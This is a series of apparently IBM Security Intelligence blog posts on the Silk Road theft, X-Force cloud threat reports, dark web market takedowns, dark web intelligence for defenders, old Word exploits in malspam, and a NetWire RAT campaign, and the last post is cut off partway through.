The Silk Road was the first modern dark web marketplace, an online place for anonymously buying and selling illegal products and services using Bitcoin.

Ross Ulbricht created The Silk Road in 2011 and operated it until 2013 when the FBI shut it down. Its creator was eventually arrested and sentenced to life in prison.

But in a plot twist right out of a spy novel, a cyber attacker stole thousands of bitcoins from Silk Road and hid them away. It took law enforcement years to find the perpetrator. By then, the Bitcoins were worth more than $3.3 billion.

The extended law enforcement operation was difficult and complex. But ultimately, this saga set the stage for future action against darknet marketplaces.

Here’s what happened.

How Silk Road Worked

Two technologies assured anonymity for both sellers and buyers on Silk Road: The Tor network and Bitcoin. The Tor network is a browser and service that routes internet traffic through a series of servers. Each of these servers then hides the IP address so that it becomes untraceable.

Bitcoin is a digital currency created in 2009. It allows for peer-to-peer transactions without the need for a central authority, such as a bank or government. Instead, the blockchain records, secures and authenticates these transactions.

People bought and sold a wide range of products and services on the Silk Road. By 2013, however, some 70% of the purchases were drugs.

Tracing drugs shipped by mail to temporary P.O. boxes became The Silk Road’s undoing. This allowed law enforcement to arrest Ulbricht’s freelance employees and piece together the Silk Road story.

Still, the Tor network prevented law enforcement from nailing down exactly who was behind Silk Road. That was the case until an FBI agent got a lucky break. A Reddit post warned that Silk Road’s IP address had become visible online. The agent probed the claim by posting various data on Silk Road, then used software to analyze the traffic until he could expose the IP address.

After some incredible and persistent desk-jockey sleuthing, Ulbricht, who used the online nickname “Dread Pirate Roberts”, was eventually caught logged into the site from a public library. He was arrested and charged with money laundering, computer hacking crimes, conspiracy to traffic narcotics and attempted murder to silence at least five people who threatened to unmask Silk Road.

Ulbricht turned down a plea deal offering a minimum 10-year sentence, which turned out to be a big mistake. He was convicted, given five sentences, including two life sentences without parole, and fined $183 million.

Mystery of the Missing Billions

Initiated by U.S. Senator Charles Schumer, the DEA and Department of Justice conducted a long and intense investigation to find the billions in Bitcoin stolen from Silk Road before the site’s shutdown.

In 2012, a man named James Zhong created some nine Silk Road accounts anonymously. He then triggered more than 140 transactions in a way that tricked Silk Road’s withdrawal processing system into releasing around 50,000 Bitcoins into those accounts.

He exploited a flaw in the system, where he made an initial deposit, then rapidly withdrew an amount less than the deposit but made the same withdrawal many times within a second before the system could register that the account was depleted. Zhong repeated this on multiple accounts, making a total of 140 withdrawals.

Zhong then moved his ill-gotten proceeds into a range of addresses to conceal who owned and controlled the Bitcoins.

Almost five years after this theft, Zhong benefited from a hard fork coin split, where Bitcoin split into two cryptocurrencies: traditional Bitcoin and Bitcoin Cash. He converted the latter back to Bitcoin, which amounted to 3,500 Bitcoin.

He then used an exchange to convert the stolen bitcoin to dollars. This made it easy for investigators to trace the transaction. They knew he was out there somewhere and waited for him to reveal himself.

To Catch a Bitcoin Thief

After the government had been investigating the crime for a decade, they finally got tipped off when a man in Athens, Georgia, called the police to say that he was burglarized and that the thieves stole “a lot of Bitcoin”, which attracted the attention of the IRS. That man was James Zhong. 

Police raided his home and found Bitcoin hidden in a “single-board computer” stashed in a popcorn tin in Zhong’s bathroom. They also found $662,000 in cash, along with bars of gold and silver, in a floor safe. 

In November of 2021, the U.S. Attorney for the Southern District of New York announced that a law enforcement operation seized more than 50,676 Bitcoin worth an incredible $3.36 billion.

Zhong pleaded guilty to one count of wire fraud, which carries a maximum sentence of 20 years in prison. He is scheduled to be sentenced on February 22, 2023, and is currently out on bail.

How the Silk Road Affair Changed Crime and Law Enforcement

The value of the seizure, the second largest ever after the $3.6 billion in stolen crypto linked to the 2016 hack of Bitfinex, caused federal law enforcement to prioritize crypto-related crimes, adding expertise and developing methods for tracing such transactions.

To cyber criminals — and also many law-abiding citizens who shared Ulbricht’s utopian libertarian views advocating for the freedom for people to buy and sell anything they like — Ulbricht’s double life sentence without the possibility of parole was a shock and an outrage. Still, no doubt, it strongly discouraged participation in dark web sites for people within reach of Western law enforcement. It also motivated everyone involved in such marketplaces to up their security and anonymity.

The post How the Silk Road Affair Changed Law Enforcement appeared first on Security Intelligence.

While cloud computing and its many forms (private, public, hybrid cloud or multi-cloud environments) have become ubiquitous with innovation and growth over the past decade, cybercriminals have closely watched the migration and introduced innovations of their own to exploit the platforms. Most of these exploits are based on poor configurations and human error. New IBM Security X-Force data reveals that many cloud-adopting businesses are falling behind on basic security best practices, introducing more risk to their organizations.

Shedding light on the “cracked doors” that cybercriminals are using to compromise cloud environments, the 2022 X-Force Cloud Threat Landscape Report uncovers that vulnerability exploitation, a tried-and-true infection method, remains the most common way to achieve cloud compromise. Gathering insights from X-Force Threat Intelligence data, hundreds of X-Force Red penetration tests, X-Force Incident Response (IR) engagements and data provided by report contributor Intezer, between July 2021 and June 2022, some of the key highlights stemming from the report include:

• Cloud Vulnerabilities are on the Rise — Amid a sixfold increase in new cloud vulnerabilities over the past six years, 26% of cloud compromises that X-Force responded to were caused by attackers exploiting unpatched vulnerabilities, becoming the most common entry point observed. 

• More Access, More Problems — In 99% of pentesting engagements, X-Force Red was able to compromise client cloud environments through users’ excess privileges and permissions. This type of access could allow attackers to pivot and move laterally across a victim environment, increasing the level of impact in the event of an attack.

• Cloud Account Sales Gain Grounds in Dark Web Marketplaces — X-Force observed a 200% increase in cloud accounts now being advertised on the dark web, with remote desktop protocol and compromised credentials being the most popular cloud account sales making rounds on illicit marketplaces.

Unpatched Software: #1 Cause of Cloud Compromise

As the rise of IoT devices drives more and more connections to cloud environments, the larger the potential attack surface becomes introducing critical challenges that many businesses are experiencing like proper vulnerability management. Case in point — the report found that more than a quarter of studied cloud incidents were caused due to known, unpatched vulnerabilities being exploited. While the Log4j vulnerability and a vulnerability in VMware Cloud Director were two of the more commonly leveraged vulnerabilities observed in X-Force engagements, most vulnerabilities observed that were exploited primarily affected the on-premises version of applications, sparing the cloud instances.

As suspected, cloud-related vulnerabilities are increasing at a steady rate, with X-Force observing a 28% rise in new cloud vulnerabilities over the last year alone. With over 3,200 cloud-related vulnerabilities disclosed in total to date, businesses face an uphill battle when it comes to keeping up with the need to update and patch an increasing volume of vulnerable software. In addition to the growing number of cloud-related vulnerabilities, their severity is also rising, made apparent by the uptick in vulnerabilities capable of providing attackers with access to more sensitive and critical data as well as opportunities to carry out more damaging attacks.

These ongoing challenges point to the need for businesses to pressure test their environments and not only identify weaknesses in their environment, like unpatched, exploitable vulnerabilities, but prioritize them based on their severity, to ensure the most efficient risk mitigation.

Excessive Cloud Privileges Aid in Bad Actors’ Lateral Movement

The report also shines a light on another worrisome trend across cloud environments — poor access controls, with 99% of pentesting engagements that X-Force Red conducted succeeding due to users’ excess privileges and permissions. Businesses are allowing users unnecessary levels of access to various applications across their networks, inadvertently creating a stepping stone for attackers to gain a deeper foothold into the victim’s cloud environment.

The trend underlines the need for businesses to shift to zero trust strategies, further mitigating the risk that overly trusting user behaviors introduce. Zero trust strategies enable businesses to put in place appropriate policies and controls to scrutinize connections to the network, whether an application or a user, and iteratively verify their legitimacy. In addition, as organizations evolve their business models to innovate at speed and adapt with ease, it’s essential that they’re properly securing their hybrid, multi-cloud environments. Central to this is modernizing their architectures: not all data requires the same level of control and oversight, so determining the right workloads, to put in the right place for the right reason is important. Not only can this help businesses effectively manage their data, but it enables them to place efficient security controls around it, supported by proper security technologies and resources.

Dark Web Marketplaces Lean Heavier into Cloud Account Sales

With the rise of the cloud comes the rise of cloud accounts being sold on the Dark Web, verified by X-Force observing a 200% rise in the last year alone. Specifically, X-Force identified over 100,000 cloud account ads across Dark Web marketplaces, with some account types being more popular than others. Seventy-six percent of cloud account sales identified were Remote Desktop Protocol (RDP) access accounts, a slight uptick from the year prior. Compromised cloud credentials were also up for sale, accounting for 19% of cloud accounts advertised in the marketplaces X-Force analyzed.

The going price for this type of access is significantly low making these accounts easily attainable to the average bidder. The price for RDP access and compromised credentials average $7.98 and $11.74 respectively. Compromised credentials’ 47% higher selling price is likely due to their ease of use, as well as the fact that postings advertising credentials often include multiple sets of login data, potentially from other services that were stolen along with the cloud credentials, yielding a higher ROI for cybercriminals.

As more compromised cloud accounts pop up across these illicit marketplaces for malicious actors to exploit, it’s important that organizations work toward enforcing more stringent password policies by urging users to regularly update their passwords, as well as implement multifactor authentication (MFA). Businesses should also be leveraging Identity and Access Management tools to reduce reliance on username and password combinations and combat threat actor credential theft.

To read our comprehensive findings and learn about detailed actions organizations can take to protect their cloud environments, review our 2022 X-Force Cloud Security Threat Landscape here.

If you’re interested in signing up for the “Step Inside a Cloud Breach: Threat Intelligence and Best Practices” webinar on Wednesday, September 21, 2022, at 11:00 a.m. ET you can register here.

If you’d like to schedule a consult with IBM Security X-Force visit: www.ibm.com/security/xforce?schedulerform

The post Old Habits Die Hard: New Report Finds Businesses Still Introducing Security Risk into Cloud Environments appeared first on Security Intelligence.

As cybercriminals remain steadfast in their pursuit of unsuspecting ways to infiltrate today’s businesses, a new report by IBM Security X-Force highlights the top tactics of cybercriminals, the open doors users are leaving for them and the burgeoning marketplace for stolen cloud resources on the dark web. The big takeaway from the data is businesses still control their own destiny when it comes to cloud security. Misconfigurations across applications, databases and policies could have stopped two-thirds of breached cloud environments observed by IBM in this year’s report.

IBM’s 2021 X-Force Cloud Security Threat Landscape Report has expanded from the 2020 report with new and more robust data, spanning Q2 2020 through Q2 2021. Data sets we used include dark web analysis, IBM Security X-Force Red penetration testing data, IBM Security Services metrics, X-Force Incident Response analysis and X-Force Threat Intelligence research. This expanded dataset gave us an unprecedented view across the whole technology estate to make connections for improving security. Here are some quick highlights:

• Configure it Out — Two out of three breached cloud environments studied were caused by improperly configured Application Programming Interface (APIs). X-Force incident responders also observed virtual machines with default security settings that were erroneously exposed to the Internet, including misconfigured platforms and insufficiently enforced network controls.
• Rulebreakers Lead to Compromise — X-Force Red found password and policy violations in the vast majority of cloud penetration tests conducted over the past year. The team also observed a significant growth in the severity of vulnerabilities in cloud-deployed applications, while the number of disclosed vulnerabilities in cloud-deployed applications rocketed 150% over the last five years.
• Automatic for the Cybercriminals — With nearly 30,000 compromised cloud accounts for sale at bargain prices on dark web marketplaces and Remote Desktop Protocol accounting for 70% of cloud resources for sale, cybercriminals have turnkey options to further automate their access to cloud environments.
• All Eyes on Ransomware & Cryptomining — Cryptominers and ransomware remain the top dropped malware into cloud environments, accounting for over 50% of detected system compromises, based on the data analyzed.

Modernization Is the New Firewall

More and more businesses are recognizing the business value of hybrid cloud and distributing their data across a diverse infrastructure. In fact, the 2021 Cost of a Data Breach Report revealed that breached organizations implementing a primarily public or private cloud approach suffered approximately $1 million more in breach costs than organizations with a hybrid cloud approach.

With businesses seeking heterogeneous environments to distribute their workloads and better control where their most critical data is stored, modernization of those applications is becoming a point of control for security. The report is putting a spotlight on security policies that don’t encompass the cloud, increasing the security risks businesses are facing in disconnected environments. Here are a few examples:

• The Perfect Pivot — As enterprises struggle to monitor and detect cloud threats, cloud environments today. This has contributed to threat actors pivoting from on-premise into cloud environments, making this one of the most frequently observed infection vectors targeting cloud environments — accounting for 23% of incidents IBM responded to in 2020.
• API Exposure — Another top infection vector we identified was improperly configured assets. Two-thirds of studied incidents involved improperly configured APIs. APIs lacking authentication controls can allow anyone, including threat actors, access to potentially sensitive information. On the other side, APIs being granted access to too much data can also result in inadvertent disclosures.

Many businesses don’t have the same level of confidence and expertise when configuring security controls in cloud computing environments compared to on-premise, which leads to a fragmented and more complex security environment that is tough to manage. Organizations need to manage their distributed infrastructure as one single environment to eliminate complexity and achieve better network visibility from cloud to edge and back. By modernizing their mission critical workloads, not only will security teams achieve speedier data recovery, but they will also gain a vastly more holistic pool of insights around threats to their organization that can inform and accelerate their response.

Trust That Attackers Will Succeed & Hold the Line

Evidence is mounting every day that the perimeter has been obliterated and the findings in the report just add to that corpus of data. That is why taking a zero trust approach is growing in popularity and urgency. It removes the element of surprise and allows security teams to get ahead of any lack of preparedness to respond. By applying this framework, organizations can better protect their hybrid cloud infrastructure, enabling them to control all access to their environments and to monitor cloud activity and proper configurations. This way organizations can go on offense with their defense, uncovering risky behaviors and enforcing privacy regulation controls and least privilege access. Here’s some of the evidence derived from the report:

• Powerless Policy — Our research suggests that two-thirds of studied breaches into cloud environments would have likely been prevented by more robust hardening of systems, such as properly implementing security policies and patching.
• Lurking in the Shadows — “Shadow IT”, cloud instances or resources that have not gone through an organization’s official channels, indicate that many organizations aren’t meeting today’s baseline security standards. In fact, X-Force estimates the use of shadow IT contributed to over 50% of studied data exposures.
• Password is “admin 1” — The report illustrates X-Force Red data accumulated over the last year, revealing that the vast majority of the team’s penetration tests into various cloud environments found issues with either passwords or policy adherence.

The recycling use of these attack vectors emphasizes that threat actors are repetitively relying on human error for a way into the organization. It’s imperative that businesses and security teams operate with the assumption of compromise to hold the line.

Dark Web Flea Markets Selling Cloud Access

Cloud resources are providing an excess of corporate footholds to cyber actors, drawing attention to the tens of thousands of cloud accounts available for sale on illicit marketplaces at a bargain. The report reveals that nearly 30,000 compromised cloud accounts are on display on the dark web, with sales offers that range from a few dollars to over $15,000 (depending on geography, amount of credit on the account and level of account access) and enticing refund policies to sway buyers’ purchasing power.

But that’s not the only cloud “tool” for sale on dark web markets with our analysis highlighting that Remote Desktop Protocol (RDP) accounts for more than 70% of cloud resources for sale — a remote access method that greatly exceeds any other vector being marketed. While illicit marketplaces are the optimal shopping grounds for threat actors in need of cloud hacks, concerning us the most is a persistent pattern in which weak security controls and protocols — preventable forms of vulnerability — are repeatedly exploited for illicit access.

To read our comprehensive findings and learn about detailed actions organizations can take to protect their cloud environments, review our 2021 X-Force Cloud Security Threat Landscape here.

Want to hear from an expert? Schedule a consultation with an X-Force team member and register for our cloud security webinar to learn more.

The post X-Force Report: No Shortage of Resources Aimed at Hacking Cloud Environments appeared first on Security Intelligence.

A globe-spanning group of law enforcement agencies took down DarkMarket, an underground dark web marketplace. The European Union Agency for Law Enforcement Cooperation (Europol) announced the successful operation on Jan.12. DarkMarket was a hub for threat actors to buy and sell counterfeit products. Stolen credit card details and malware were up for grabs, as well as other illicit goods and services.

At the time of the takedown, DarkMarket was the world’s largest illegal dark web marketplace with about 500,000 users and 2,400 sellers. Its more than 320,000 sales involved over 4,650 bitcoin (worth about $157 million) and 12,800 Monero (about $1.8 million).

Dark Market Operator Arrested

The takedown became possible after an arrest by the Central Criminal Investigation Department in Oldenburg, Germany. They seized an Australian citizen who was the alleged operator of DarkMarket near the German-Danish border, Europol says. 

The cyber crime unit of the Koblenz Public Prosecutor’s Office then launched an investigation into this person and their dark web marketplace. This effort enabled officers to shut down the marketplace. They seized over 20 of its servers located in Moldova and Ukraine.

Europol organized information exchange and provided specialist support. The agency says the international partners planned on using the data stored on those servers to go after the site’s moderators, sellers and buyers.

Other Dark Web Marketplace Stings 

Law enforcement agencies across the world seized several dark web markets over the past few years.

For instance, the FBI worked with digital crime investigators, as well as European law enforcement to obtain a warrant for the seizure of dark web index Deep Dot Web in May 2019. Law enforcement agencies based in Israel, France, Germany, the Netherlands and Brazil made arrests as part of the takedown.

A few months later, the U.S. Justice Department announced the indictment of a South Korean national for running Welcome to Video, then the largest dark web child abuse website. IRS Criminal Investigation first seized Welcome to Video’s servers in 2018. Following this, law enforcement in the U.S. and 11 other countries arrested and filed charges against 337 of the site’s users.

In addition, law enforcement arrested 179 people, seized 500 kilograms of illegal drugs and confiscated $6.5 million in funds in September 2020 in a dark web marketplace takedown.

How to Prevent Your Data from Ending up on the Dark Web

Law enforcement agencies across the world continue to prosecute criminals who hide in the dark web. These threat actors also continue to use the dark web to prey upon everyday users.

Keeping this in mind, it’s important that businesses and other online entities work to keep their sensitive data off a dark web marketplace. The first thing they should consider doing is applying encryption to their data. Doing so will not only help them comply with a number of data protection rules. It will also help them render their data useless if it ends up on a dark web marketplace like DarkMarket.

From there, undo the silo in which data security resides. Data defense needs to function as part of a broader landscape. This itself will help keep that data safe. With that in mind, organizations can work to automate and manage their data security workflows across all departments.

The post ‘DarkMarket’ Dark Web Marketplace Taken Down in International Operation appeared first on Security Intelligence.

Financial firms continue to move to digital-first deployments, as retail branches close, and people shift to remote work. This shift makes understanding and preventing even common darknet, or dark web, threats a priority.

Financial cybersecurity investment institutions need to understand what the dark web is, provide their security teams with the tools to explore it safely and prioritize areas of concern. Taken together, these actions can limit risk and improve regulatory compliance.

About the Darknet

Originally designed to hide users’ activities and identities, the dark web, also known as darknet, quickly became an obstacle as malicious actors leveraged tools, such as The Onion Router (TOR) to create a digital marketplace where nothing was off-limits or beyond reach. From illegal items to stolen data, there’s a good chance someone on the dark web has obtained, or has access to exactly what bad actors are after.

Not surprisingly, financial data remains one of the most popular purchases on the dark web. Credentials for high-value bank accounts start at just $500, and credit card data is sold in large volumes at low cost. Financial firms are often forced to close compromised accounts and refund fraudulent transactions, since there is little recourse when it comes to finding the origin of this pilfered information.

Dark Web: The Deep and the Darkness

No discussion of the dark web is complete without a quick primer on the difference between deep and dark deployments.

The deep web is classified as data that isn’t indexed and readily available online. While this type of data makes up 90% of the internet at large, the dark web accounts for just 0.005%, or around 8,400 live sites.

Financial firms regularly interact with the deep web. It’s where secured client data and essential enterprise assets are stored. The deep web is fundamental for finance and critical for consumer confidence. If secured financial information was readily available with a simple online search — which still happens with alarming regularity — clients would quickly abandon banks in favor of more secure alternatives.

The dark web, meanwhile, is a place without rules or regulation. Both legal and illegal activities exists side-by-side, unchecked by regulatory or operational obligations on the dark web. And, accessing the darknet isn’t complicated. Users typically leverage the Tor Browser to encrypt and obscure their location and IP address. Still, it’s nothing like the surface web.

The Economies of the Dark Web

The darknet isn’t just a free-for-all of fraudulent transactions and stolen credentials. As noted by Financial Management, this twilight trading ground has developed its own economy. It is one that follows the laws of supply and demand and sees criminal ‘vendors’ fighting for market share by offering top-tier products, lower prices and enhanced customer service.

This creates a kind of paradox. While the dark web economy doesn’t match the rest of the web in terms of design, it displays the same type of inventory and incentive tools and strategies as more common businesses. As a result, it’s critical for financial firms to take the same approach to dusk economies as those in the daylight, discovering as much information as possible.

This requires a shift in thinking. Rather than waiting for malicious actors or dark web buyers to compromise financial networks, banks must take an intelligence-based approach to data discovery. What information is available on the dark web? How much (if any) client data has been compromised? How have the bad actors made it available to potential purchasers?

Equipped with actionable insight, financial firms can begin developing proactive incident response. That could mean anything from changing account details before compromises happen to deploying security tools that better defend against theft. With the dark web now governed by supply and demand, making supply worthless is the quickest way for banks to boost their defense against shady economies.

How Your Cybersecurity Team Can Fight Back

It’s one thing to recognize the need to improve data gathering on the dark web; it’s another entirely for banks to put policy into practice.

So, how do financial firms actively protect themselves against bad actors?

It starts with an understanding of current infosec expectations, such as those described in the FFIEC Information Technology Examination Handbook. These guidelines can help banks identify potential weak points across current efforts to manage protected information. From there, they can implement effective network and access controls.

By knowing which areas need the most work, financial firms can prioritize essential infosec investments. No single dark web cybersecurity solution is enough to combat all emerging threats. Instead, organizations must adopt defensively diverse portfolios that include:

Expert Insight

Uncovering tactics and technologies used by darknet attackers is critical to improving current defenses. Human experts are the best defense. Banks must invest in security professionals capable of creating and cultivating dark web personas themselves. By becoming a trusted member of this shadow community, firms have a better chance of finding stolen data before it can be used to infiltrate accounts or compromise key systems. Then, they can integrate collected intelligence into existing defensive frameworks.

Active Listening

It’s not enough to know that data has been compromised or if attackers are attempting to breach financial networks. Firms need to know what’s being said about them on the darknet and how stolen information is being used.

For example, if banks can identify a cache of pilfered business account credentials for sale and observe interest from other users in purchasing this data, they can proactively close and re-secure these accounts to limit potential risk. With enough lead time, it’s also possible for teams to create honeypot accounts that allow attackers in but keep them contained. This, in turn, provides IT teams valuable threat vector data.

Machine Learning

While human desire and demand form the foundation of dark web functions, even the most experienced infosec experts can’t cover the entire economy at once. Advanced machine learning and artificial intelligence tools can help bridge the knowledge gap by analyzing current compromise patterns and predicting potential outcomes. This way, banks can identify top compromise targets and deploy purpose-built protections to limit the risk of darknet disclosure.

A Mirror, Darkly

As dark web economies evolve, a malicious mirror emerges. Fraudulent financial transactions have their own economy that mimics above-the-board deals. To deliver dark web security, organizations must look into the abyss, learn from it and leverage operational insight to defend against fraud.

The post Darknet Cybersecurity: How Finance Institutions Can Defend Themselves appeared first on Security Intelligence.

As reported in the IBM X-Force Threat Intelligence Index 2020, X-Force research teams operate a network of globally distributed spam honeypots, collecting and analyzing billions of unsolicited email items every year. Analysis of data from our spam traps reveals trending tactics that attackers are utilizing in malicious emails, specifically, that threat actors are continuing to target organizations through the exploitation of older Microsoft Word vulnerabilities (CVE-2017-0199 and CVE-2017-11882).

• CVE-2017-0199 was first disclosed and patched in April 2017. It allows an attacker to download and execute a Visual Basic Script containing PowerShell commands after the victim opens a malicious document containing an embedded exploit. Unlike many other Microsoft Word and WordPad exploits, the victim does not need to enable macros or accept any prompts — the document just loads and executes a malicious file of the attacker’s choosing.
• CVE-2017-11882 was first disclosed and patched in November 2017. This vulnerability involves a stack buffer overflow in the Microsoft Equation Editor component of Microsoft Office that allows for remote code execution. Interestingly, the vulnerable component was 17 years old (compiled in 2000) at the time of exploitation and unchanged since its removal in 2018.

These vulnerabilities, which were reported and subsequently issued patches in 2017, are the most frequently used of the top eight vulnerabilities observed in 2019. They were used in nearly 90 percent of malspam messages despite being well-publicized and dated. These findings highlight how delays in patching allow cybercriminals to continue to use old vulnerabilities and still see some success in their attacks.

2 Years and Still Going Strong

In addition to these vulnerabilities’ popularity in malspam, the volume of 2019 network attacks that targeted X-Force-monitored customers while attempting to exploit them was 25 times higher than the combined number of network attacks attempting to exploit similar vulnerabilities that leverage Object Linking and Embedding (OLE).

Our analysts did not observe a commonality regarding the malicious payloads used post-exploitation, which means that using these vulnerabilities is the choice of a wide array of threat actors and not specific to a small number of campaigns or adversarial groups.

Figure 1: Observed usage of top CVEs in 2019 spam emails (Source: IBM X-Force)

Another noteworthy insight from the figure above is that most vulnerabilities commonly used by cybercriminals are older ones. None of the vulnerabilities leveraged in 2019 were disclosed last year and only one was disclosed in 2018. The rest go back as far as 2003, further driving home the point that when it comes to malicious cyber activity, what’s old is new and what’s new is old.

The Allure of Older Vulnerabilities

Why would a wide array of threat actors use the same two old and well-known exploits in so many of their attacks? There are a few possible explanations, but the essence of it is they are cheaper, better documented, battle-tested and more likely to lead to legacy systems that are no longer being patched.

First, the exploits are very convenient for an attacker to use in that they don’t require user interaction. Unlike more recent Word vulnerabilities, which require the attacker to convince the user to enable macros, the exploits for these particular vulnerabilities automatically execute when the document is opened. This can help reduce the chance of arousing user suspicions and, accordingly, increase the rate of success.

Second, since so many different actors use these vulnerabilities, it can complicate attribution, as their widespread usage makes associating them with any particular individual or group difficult.

For example, IBM researchers recently observed threat actors leveraging these CVEs and using a variant of the X-Agent malware, which was historically associated with a threat actor known to IBM as ITG05 (also known as APT28). That threat group has been attributed to Russia’s Main Intelligence Directorate. But while they were being used by highly sophisticated threat actors, these vulnerabilities were also leveraged by low-end spammers dropping commodity malware through massive email campaigns.

The reuse of common exploits is a convenient way to muddy threat actor attribution, especially for groups that wish to remain anonymous in their operations. It can allow threat actors to hide among a large volume of activity, obfuscating their actions.

The third and perhaps most likely reason for the continued use of these vulnerabilities is the simple ease and convenience of generating documents that can exploit them. Because these types of documents are essential to the day-to-day operations of many target organizations, they are often not blocked by enterprise email filters. As a final bonus to threat actors, they are also some of the cheapest exploits cybercriminals can buy.

X-Force’s dark web research of underground forums highlights multiple offerings of free document builders that leverage each of these vulnerabilities. Our team also identified free YouTube videos focused on each vulnerability, illustrating how an attacker can generate a document to exploit these issues.

Figure 2: YouTube videos detailing how to generate documents exploiting CVEs 2017-0199, 2017-11882 (Source: IBM X-Force)

One should keep in mind that successful exploitation of older vulnerabilities is more likely to happen on older, unpatched operating systems (OSs) and legacy systems where OS end-of-life means that no new patches are even available. These kinds of systems are most likely used by organizations that can’t patch due to other issues or priorities. While there are many reasons that can contribute to the decision to defer patching, that decision is never a good one in the long run.

What Can Companies Do With This Sort of Information?

Older vulnerabilities are clearly not going away any time soon, so organizations need to be prepared to defend against their attempted exploitation. IBM X-Force Incident Response and Intelligence Services (IRIS) has the following tips for organizations to better protect themselves:

• Asset management is an ongoing process that should be top of mind for risk management. Part of this process is continually assessing risk to critical systems and considering the consequences of not patching them. Reassess the risks and consider patching and updating operating systems as soon as possible. Reality check: Windows 7’s end-of-life took place on January 14, 2020. Is your organization ready to move to an updated OS?
• On the application level, ensure that patches for productivity suites — especially Microsoft software — are applied as soon as they become available.
• Monitor the organization’s environment for PowerShell callouts that may be attempting to download and execute malicious payloads.
• Continue user education on the risks of opening attachments from unknown sources, as vulnerabilities like these do not require any user interaction beyond opening to cause harm.
• Scope and engage in a vulnerability management program to determine if older vulnerabilities are exposing your environment to exploitation by an attacker.

Download the latest X-Force Threat Intelligence Index

The post What’s Old Is New, What’s New Is Old: Aged Vulnerabilities Still in Use in Attacks Today appeared first on Security Intelligence.

Some of the best intelligence an operator or decision-maker can obtain comes straight from the belly of the beast. That’s why dark web intelligence can be incredibly valuable to your security operations center (SOC). By leveraging this critical information, operators can gain a better understanding of the tactics, techniques and procedures (TTPs) employed by threat actors. With that knowledge in hand, decision-makers can better position themselves to protect their organizations.

This is in line with the classic teachings from Sun Tzu about knowing your enemy, and the entire passage containing that advice is particularly relevant to cybersecurity:

“If you know the enemy and know yourself, you need not fear the result of a hundred battles. If you know yourself but not the enemy, for every victory gained you will also suffer a defeat. If you know neither the enemy nor yourself, you will succumb in every battle.”

Let’s translate the middle section of this passage into colloquial cybersecurity talk: You can have the best security operations center in the world with outstanding cyber hygiene, but if you aren’t feeding it the right information, you may suffer defeats — and much of that information comes from dark web intelligence.

Completing Your Threat Intelligence Picture

To be candid, if you’re not looking at the dark web, there is a big gap in your security posture. Why? Because that’s where a lot of serious action happens. To paraphrase Sir Winston Churchill, the greatest defense against a cyber menace is to attack the enemy’s operations as near as possible to the point of departure.

Now, this is not a call to get too wrapped up in the dark web. Rather, a solid approach would be to go where the nefarious acts are being discussed and planned so you can take the appropriate proactive steps to prevent an attack on your assets.

The first step is to ensure that you have a basic understanding of the dark web. One common way to communicate over the dark web involves using peer-to-peer networks on Tor and I2P (Invisible Internet Project). In short, both networks are designed to provide secure communications and hide all types of information. Yes, this is only a basic illustration of dark web communications, but if your security operations center aims to improve its capabilities in the dark web intelligence space, you must be able to explain the dark web in these simple terms for two reasons:

1. You cannot access these sites as you would any other website.
2. You’re going to have to warn your superiors what you’re up to. The dark web is an unsavory place, full of illegal content. Your decision-makers need to know what will be happening with their assets at a high level, which makes it vitally important to speak their language.

And this part is critical: If you want to get the most out of dark web intelligence, you may have to put on a mask and appear to “be one of the bad guys.” You will need to explain to your decision-makers why full-time staff might have to spend entire days as someone else. This is necessary because when you start searching for granular details related to your organization, you may have to secure the trust of malicious actors to gain entry into their circles. That’s where the truly rich intelligence is.

This could involve transacting in bitcoins or other cryptocurrencies, stumbling upon things the average person would rather not see, trying to decipher between coded language and broken language, and the typical challenges that come with putting up an act — all so you can become a trusted persona. Just like any other relationship you develop in life, this doesn’t happen overnight.

Of course, there are organizations out there that can provide their own “personas” for a fee and do the work for you. Using these services can be advantageous for small and medium businesses that may not have the resources to do all of this on their own. But the bigger your enterprise is, the more likely it becomes that you will want these capabilities in-house. In general, it’s also a characteristic of good operational security to be able to do this in-house.

Determining What Intelligence You Need

One of the most difficult challenges you will face when you decide to integrate dark web intelligence into your daily operations is figuring out what intelligence could help your organization. A good start is to cluster the information you might collect into groups. Here are some primer questions you can use to develop these groups:

• What applies to the cybersecurity world in general?
• What applies to your industry?
• What applies to your organization?
• What applies to your people?

For the first question, there are plenty of service providers who make it their business to scour the dark web and collect such information. This is an area where it may make more sense to rely on these service providers and integrate their knowledge feeds into existing ones within your security operations center. With the assistance of artificial intelligence (AI) to manage and make sense of all these data points, you can certainly create a good defensive perimeter and take remediation steps if you identify gaps in your network.

It’s the second, third and fourth clusters that may require some tailoring and additional resources. Certain service providers can provide industry-specific dark web intelligence — and you would be wise to integrate that into your workflow — but at the levels of your organization and its people, you will need to do the work on your own. Effectively, you would be doing human intelligence work on the dark web.

Why Human Operators Will Always Be Needed

No matter how far technological protections advance, when places like the dark web exist, there will always be the human element to worry about. We’re not yet at the stage where machines are deciding what to target — it’s still humans who make those decisions.

Therefore, having top-level, industrywide information feeds can be great and even necessary, but it may not be enough. You need to get into the weeds here because when malicious actors move on a specific target, that organization has to play a large role in protecting itself with specific threat intelligence. A key component of ensuring protections are in place is knowing what people are saying about you, even on the dark web.

As Sun Tzu said: “If you know the enemy and know yourself, you need not fear the result of a hundred battles.” There’s a lot of wisdom in that, even if it was said some 2,500 years ago.

The post The Case for Integrating Dark Web Intelligence Into Your Daily Operations appeared first on Security Intelligence.

IBM X-Force researchers have discovered a new campaign targeting organizations with fake business emails that deliver NetWire remote-access Trojan (RAT) variants.

The RAT is hidden inside an IMG file, which is a file extension used by disk imaging software. Since many attachments can be automatically blocked by email security controls, spammers often carefully choose the type of file extensions they use in malspam messages, and shuffle the types of files they conceal malware in. X-Force’s analysis shows that emails delivered by the NetWire RAT in this campaign are being sent from a small number of unique senders supposedly located in Germany.

The NetWire RAT is a malicious tool that emerged in the wild in 2012. This multi-platform malware has since undergone various upgrade cycles and was detected in different types of attacks that range from cybercrime endeavors by Nigerian scammers to advanced persistent threat (APT) attacks. The NetWire RAT is a commercial offering that can be easily purchased on Dark Web markets, which means that it can be used by just about any threat actor.

This isn’t the first time NetWire is being delivered in fake business communications. In a previous campaign launched in September 2019, its operators sent booby-trapped fake PDF files to potential victims, indicating it was a commercial invoice. The actual file was an executable that installed the NetWire RAT as soon as the file was clicked.

Extracting a RAT

In one of the samples we looked into, an IMG file named “Sales_Quotation_SQUO00001760.img.” was a way for the attackers to archive the malware until the file was clicked open. Once opened, it extracted an executable: the NetWire RAT.

Immediately after this initial execution, the malware established persistence via a scheduled task, a common tactic to many malware developers. Scheduled tasks enable the malware to keep checking that it’s active or relaunch itself in a recurring fashion.

